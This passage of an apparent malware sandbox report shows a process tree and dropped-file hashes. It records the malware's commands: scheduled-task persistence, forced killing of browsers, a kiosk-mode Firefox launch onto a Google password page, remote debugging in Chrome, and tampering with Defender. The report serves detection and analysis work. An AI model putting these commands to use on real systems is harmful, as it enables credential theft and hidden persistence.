                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=2088,i,745531786886206753,11880836929260612988,131072 /prefetch:2
                                                                  6⤵
                                                                    PID:3732
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1420 --field-trial-handle=2088,i,745531786886206753,11880836929260612988,131072 /prefetch:8
                                                                    6⤵
                                                                      PID:844
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1496 --field-trial-handle=2088,i,745531786886206753,11880836929260612988,131072 /prefetch:8
                                                                      6⤵
                                                                        PID:3132
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2096 --field-trial-handle=2088,i,745531786886206753,11880836929260612988,131072 /prefetch:1
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3248
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1940 --field-trial-handle=2088,i,745531786886206753,11880836929260612988,131072 /prefetch:1
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3460
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3264 --field-trial-handle=2088,i,745531786886206753,11880836929260612988,131072 /prefetch:2
                                                                        6⤵
                                                                        • Drops file in Program Files directory
                                                                        PID:2816
                                                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:4796
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4820
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 956
                                                                      5⤵
                                                                      • Loads dropped DLL
                                                                      • Program crash
                                                                      PID:4840
                                                                  • C:\Users\Admin\AppData\Local\Temp\1008082001\6ce3ff0b19.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1008082001\6ce3ff0b19.exe"
                                                                    4⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Modifies system certificate store
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2772
                                                                  • C:\Users\Admin\AppData\Local\Temp\1008083001\8b50f7be53.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1008083001\8b50f7be53.exe"
                                                                    4⤵
                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                    • Checks BIOS information in registry
                                                                    • Executes dropped EXE
                                                                    • Identifies Wine through registry keys
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2876
                                                                  • C:\Users\Admin\AppData\Local\Temp\1008084001\e482d557fc.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1008084001\e482d557fc.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:3064
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /F /IM firefox.exe /T
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:608
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /F /IM chrome.exe /T
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2268
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /F /IM msedge.exe /T
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Kills process with taskkill
                                                                      PID:2428
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /F /IM opera.exe /T
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Kills process with taskkill
                                                                      PID:2004
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /F /IM brave.exe /T
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Kills process with taskkill
                                                                      PID:2188
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                      5⤵
                                                                        PID:3456
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                          6⤵
                                                                          • Checks processor information in registry
                                                                          • Modifies registry class
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:3488
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.0.485608849\1090414647" -parentBuildID 20221007134813 -prefsHandle 1196 -prefMapHandle 1004 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60ba393d-355a-4f8c-b04f-34af88bdea00} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 1308 ffd0458 gpu
                                                                            7⤵
                                                                              PID:3172
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.1.1557595072\1848235806" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {adc3367f-f9f3-4b23-9fc4-022ebbe7ad2c} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 1536 38eb558 socket
                                                                              7⤵
                                                                                PID:2920
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.2.1490772745\1426775681" -childID 1 -isForBrowser -prefsHandle 1944 -prefMapHandle 1940 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dc7c452-d651-4fe8-912a-0f2f6bc4469d} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 1980 ff5c158 tab
                                                                                7⤵
                                                                                  PID:1672
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.3.394562463\1410573074" -childID 2 -isForBrowser -prefsHandle 2624 -prefMapHandle 2620 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {00511c20-ad26-4731-9136-22123ee888ec} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 2640 1c84fb58 tab
                                                                                  7⤵
                                                                                    PID:4076
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.4.229278523\557919873" -childID 3 -isForBrowser -prefsHandle 3728 -prefMapHandle 3724 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3810bbaf-a2fd-4a18-99cd-60c322d48a32} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 3740 1f5e3058 tab
                                                                                    7⤵
                                                                                      PID:3696
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.5.1666875491\861712205" -childID 4 -isForBrowser -prefsHandle 3844 -prefMapHandle 3848 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f2b3a48-2269-4c83-93dc-38e8a925fb8c} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 3940 1f7b3558 tab
                                                                                      7⤵
                                                                                        PID:1984
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3488.6.1434551173\454569451" -childID 5 -isForBrowser -prefsHandle 4136 -prefMapHandle 4140 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0197574a-f2f4-46fb-ab65-eb58a72bfc40} 3488 "\\.\pipe\gecko-crash-server-pipe.3488" 4124 1f7b2658 tab
                                                                                        7⤵
                                                                                          PID:3184
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1008085001\f8a006ba65.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1008085001\f8a006ba65.exe"
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Windows security modification
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:3164
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "-1436273255-1988023439971094581305261699-945005983484162099-89895078164064999"
                                                                              1⤵
                                                                                PID:992
                                                                              • C:\Windows\system32\conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe "-3761876786684856381728076324-267599950130399679720964837205951453-357348404"
                                                                                1⤵
                                                                                  PID:324
                                                                                • C:\Windows\system32\conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe "-2026752809-191688921-245903865-178664898214694134481192133289-2072447300-631672607"
                                                                                  1⤵
                                                                                    PID:2856
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "608752852-160207074-198131830-351442277154643951451156119913312734391483627376"
                                                                                    1⤵
                                                                                      PID:3012
                                                                                    • C:\Windows\system32\conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe "953463836-1796377228-782396922-1865712093995732397743973-108161561450050810"
                                                                                      1⤵
                                                                                        PID:2096
                                                                                      • C:\Windows\system32\conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe "1203465090-365149516-26298930770571552016436974763863607421687955908-256571356"
                                                                                        1⤵
                                                                                          PID:3568
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe "2127938315-969738977-1713799413205400952345049516012472826004858655531503045089"
                                                                                          1⤵
                                                                                            PID:3704
                                                                                          • C:\Windows\system32\conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe "-1651241818-598011165289608665582825673-2084889723-21485792610012915111759378913"
                                                                                            1⤵
                                                                                              PID:3716
                                                                                            • C:\Windows\system32\conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe "-63808673-2001474999-17090664571286042588652682276881327285-18519270452072537364"
                                                                                              1⤵
                                                                                                PID:4072
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "-6067776371519653217-27287611558460945912542382-1089212885-408054032-459880136"
                                                                                                1⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:1956
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "-754870357780284992-164769847617229054921988612568-171707132021260696731969108683"
                                                                                                1⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:2932
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "-188778010-50729467760151767466106251482923934-1677410110-1362870684-1183855066"
                                                                                                1⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:644
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "181523596-495988321931659826-1933612244-10573747561391842891-1070102518-1058864950"
                                                                                                1⤵
                                                                                                  PID:2084
                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe "-59853314-11859614411754975327-1749452161-1891055399-1015575415648020586-450171410"
                                                                                                  1⤵
                                                                                                    PID:2052
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-1452542294-1416897351728713782112135575-1638369494-14554665001679532176-910244605"
                                                                                                    1⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:1800
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "870459225-1890396340-717548781-1100237185368097271-533783062-201021837-706022894"
                                                                                                    1⤵
                                                                                                      PID:3476
                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe "-512808208514096771-17229030641443858363-17915243741673444857-2908201742138925056"
                                                                                                      1⤵
                                                                                                        PID:3644
                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe "-9664847898678719313583897221466662529125990020214545846792797604101635426076"
                                                                                                        1⤵
                                                                                                          PID:3640
                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe "1487288910-903733952958939389-1419904135158273060687681584-51487806-496010719"
                                                                                                          1⤵
                                                                                                            PID:3664
                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe "-18350232221059173769-11076642461355701325-1738135010-1683466658-1544945359-1567068436"
                                                                                                            1⤵
                                                                                                              PID:1544
                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe "-1802582400-811932063-124923731-165127651619041784361271374976-16211982661444521071"
                                                                                                              1⤵
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4828

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                                                              Filesize

                                                                                                              264KB

                                                                                                              MD5

                                                                                                              f50f89a0a91564d0b8a211f8921aa7de

                                                                                                              SHA1

                                                                                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                              SHA256

                                                                                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                              SHA512

                                                                                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                                                                                              Filesize

                                                                                                              16B

                                                                                                              MD5

                                                                                                              18e723571b00fb1694a3bad6c78e4054

                                                                                                              SHA1

                                                                                                              afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                                              SHA256

                                                                                                              8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                                              SHA512

                                                                                                              43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                              Filesize

                                                                                                              31KB

                                                                                                              MD5

                                                                                                              a6c803e03c0ae4788a7b73dfec1656eb

                                                                                                              SHA1

                                                                                                              5778f3ae2b53aef6e7c5dcdcd29f5aa734595f38

                                                                                                              SHA256

                                                                                                              6f8544a3fa3c24ce65d15d9ef0a0ef971540eb325da80c69cdd18284c7de94a9

                                                                                                              SHA512

                                                                                                              fa479d50f11c767b8bf7cafc420f3382398495b3279543583f280ddb0192159f5ab15085fd8d92494acc2b69183dbb50b14ffcb4d605ea84c4e4790ab6b9ddf2

                                                                                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                              Filesize

                                                                                                              13KB

                                                                                                              MD5

                                                                                                              f99b4984bd93547ff4ab09d35b9ed6d5

                                                                                                              SHA1

                                                                                                              73bf4d313cb094bb6ead04460da9547106794007

                                                                                                              SHA256

                                                                                                              402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

                                                                                                              SHA512

                                                                                                              cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe

                                                                                                              Filesize

                                                                                                              1.8MB

                                                                                                              MD5

                                                                                                              fa351b72ffb13bfc332a25a57a7f075f

                                                                                                              SHA1

                                                                                                              5af49613c179bed23dd43d76aedbe3d1b63004a3

                                                                                                              SHA256

                                                                                                              d2c90431f09fc7818c5afb43bbec077fc29544ddcb786bc655a82d1c33e20cdc

                                                                                                              SHA512

                                                                                                              de49eeaa695f9d6252bd3b547689b0e648999c7ee68d2e16a3d073d88505a1c6b0a4da538db7ce52653bfc2dc89a13dd07c894f8e28f9227f1d1c92df67216f9

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe

                                                                                                              Filesize

                                                                                                              50KB

                                                                                                              MD5

                                                                                                              666248c216a3f63828f739839230f9f6

                                                                                                              SHA1

                                                                                                              13690837235053762a538b4c5b2b601ec9f6bb22

                                                                                                              SHA256

                                                                                                              00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

                                                                                                              SHA512

                                                                                                              37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe

                                                                                                              Filesize

                                                                                                              1.4MB

                                                                                                              MD5

                                                                                                              e1cf72329542de8b3004517ee07d8371

                                                                                                              SHA1

                                                                                                              c22ac1f279cc11dffd30a41863181da598231d4b

                                                                                                              SHA256

                                                                                                              301e56052cf570110e66a429c0acc2454569ff5f966af0e809bef33eb2e02baa

                                                                                                              SHA512

                                                                                                              7267aa2244edd22b4ceda89e8e188180bcc409320f77b0d9fc9fbb63c0906ab23dc9dff4bd5e02018aa08194cb8bb8dcd0b28ae1c44b2497a13bb21411ec6edc

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008030001\document.exe

                                                                                                              Filesize

                                                                                                              72KB

                                                                                                              MD5

                                                                                                              8d52069bd117da94e0b0b70e73e33fb0

                                                                                                              SHA1

                                                                                                              e8090adddff167e1bda4194af968ba4bc22a2d60

                                                                                                              SHA256

                                                                                                              b3e217c467cfe1e8079e82b88f2f99950a9459330a8843070ebb34bf3e2bcf38

                                                                                                              SHA512

                                                                                                              7a91eeb0cf3edb53d0ac3d51abe85c97bb09da5b334b387fda90144a2f3729693367c451fee9e04cb953dcf8d9d1b91ee12961bfe9f1e53c0ab06aababd696ed

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008081001\f00ca64903.exe

                                                                                                              Filesize

                                                                                                              4.2MB

                                                                                                              MD5

                                                                                                              402af0c244e89244c6e899931f5a23b9

                                                                                                              SHA1

                                                                                                              4413e4e963830f4631a64830b8dc8bf3e427d53a

                                                                                                              SHA256

                                                                                                              e4f2dd198edb21635f20639dc65bcae2b2cf6a66b9f8a37b7253dd7b353c3ef9

                                                                                                              SHA512

                                                                                                              fdcce9f496704336b45ec255095f7dd76fa0af26cf8ab784a283d55d5b05bd94ef3d3e61bee5b9f7e20251dfaaef9834373e6ff39e21fc689551a4ae5a27f1da

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008082001\6ce3ff0b19.exe

                                                                                                              Filesize

                                                                                                              1.8MB

                                                                                                              MD5

                                                                                                              c29c30bfb75bf498848c908638625e45

                                                                                                              SHA1

                                                                                                              9879e768d895a6f4fa69bbff4c4d7193321dcc9f

                                                                                                              SHA256

                                                                                                              06a34982b9154716e14297712ecb8efb2bc9bcce381e6e4305cf2e1579bfdcd4

                                                                                                              SHA512

                                                                                                              ada1d2345e2a0bbb3aef2916cc001094524638a38f431817eb80207215c9eb935e2f7dfee50870b90dc43af4d39a72b4640d12aaaa51c839da0c7ef076167205

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008083001\8b50f7be53.exe

                                                                                                              Filesize

                                                                                                              1.8MB

                                                                                                              MD5

                                                                                                              e5a48f23e7b32f452f9bf2e6bf42094c

                                                                                                              SHA1

                                                                                                              4f95895d7a641793c3e603847c06ffd51fb29940

                                                                                                              SHA256

                                                                                                              90a76e28f761c3a0580ec1b56eb241b57001091cac3d63378dec4368279103dd

                                                                                                              SHA512

                                                                                                              3ad71818ffa0544e8c7e302c49a51b7e58b42543a0640a588e448d4d1ebb9e4b880e1869a634b7e66a2d11849eb2c68672b575f7b6386393bc02ff052293ded4

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008084001\e482d557fc.exe

                                                                                                              Filesize

                                                                                                              901KB

                                                                                                              MD5

                                                                                                              6e6af329feb47e6d6dec9389429cfd07

                                                                                                              SHA1

                                                                                                              dfd44cfcabd9d5ae746ad4221e55302b89002b0a

                                                                                                              SHA256

                                                                                                              f6dc47d57da7bec7190d32e4140b861714fefc6ceac91faf1ae3d65eae141d5d

                                                                                                              SHA512

                                                                                                              da9e894874433ae748912ad95dc0e92a9e9cb44f95755d2ba929355abd9de631fa9b4fddebd1647d655ca8c62cc7284c97a1d4de174ce47b3cd6ec5c51a5e157

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1008085001\f8a006ba65.exe

                                                                                                              Filesize

                                                                                                              2.6MB

                                                                                                              MD5

                                                                                                              737f95c4ab6db790a94058de0ae65785

                                                                                                              SHA1

                                                                                                              27e0429b7426a619bfdfe0c71e4f5c995eb82dad

                                                                                                              SHA256

                                                                                                              b15c5a342a7300a91373426ca437580d1dc969403e9a855cf89c4876aaa3f3eb

                                                                                                              SHA512

                                                                                                              cc57f79bc6ed4884d174ff37cc5dd64b71946c0114b5fdb1df8aac9248db9425afcd93444bfa1a925801d82caac18eec91ad6ce6eb0d2aacc5c3f77ca693d1f7

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\CabAE4B.tmp

                                                                                                              Filesize

                                                                                                              70KB

                                                                                                              MD5

                                                                                                              49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                              SHA1

                                                                                                              1723be06719828dda65ad804298d0431f6aff976

                                                                                                              SHA256

                                                                                                              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                              SHA512

                                                                                                              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\TarAE7D.tmp

                                                                                                              Filesize

                                                                                                              181KB

                                                                                                              MD5

                                                                                                              4ea6026cf93ec6338144661bf1202cd1

                                                                                                              SHA1

                                                                                                              a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                              SHA256

                                                                                                              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                              SHA512

                                                                                                              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                              MD5

                                                                                                              15e30b215f9ffa75cb1b5286ab26b6d0

                                                                                                              SHA1

                                                                                                              80b925698720de26222a4d7415d7a3fd711168e6

                                                                                                              SHA256

                                                                                                              2f66b770e77265722c0de698db8c61e8dcb8c8883100a9f16f5d4b92067c1667

                                                                                                              SHA512

                                                                                                              07671ee48bcad3227533758762185fbc7e2368eebd1466360946679cb0a47ce62c0f9b8fbc4c0f06b293bf539b9cf46d82f1b12821b4f0e1f218f61464153311

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                                                                              Filesize

                                                                                                              2KB

                                                                                                              MD5

                                                                                                              82f229d0c36b68073da70ef5958e425d

                                                                                                              SHA1

                                                                                                              2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                                                                              SHA256

                                                                                                              0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                                                                              SHA512

                                                                                                              4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                                              Filesize

                                                                                                              442KB

                                                                                                              MD5

                                                                                                              85430baed3398695717b0263807cf97c

                                                                                                              SHA1

                                                                                                              fffbee923cea216f50fce5d54219a188a5100f41

                                                                                                              SHA256

                                                                                                              a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                                                                                              SHA512

                                                                                                              06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                                              Filesize

                                                                                                              8.0MB

                                                                                                              MD5

                                                                                                              a01c5ecd6108350ae23d2cddf0e77c17

                                                                                                              SHA1

                                                                                                              c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                                                                                              SHA256

                                                                                                              345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                                                                                              SHA512

                                                                                                              b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                                                                                            • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                                                                              Filesize

                                                                                                              27KB

                                                                                                              MD5

                                                                                                              238ec4d17050e1841e8e0171407c2260

                                                                                                              SHA1

                                                                                                              2c8c14b257641f1e1151c6303dabde01621314f2

                                                                                                              SHA256

                                                                                                              163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                                                                              SHA512

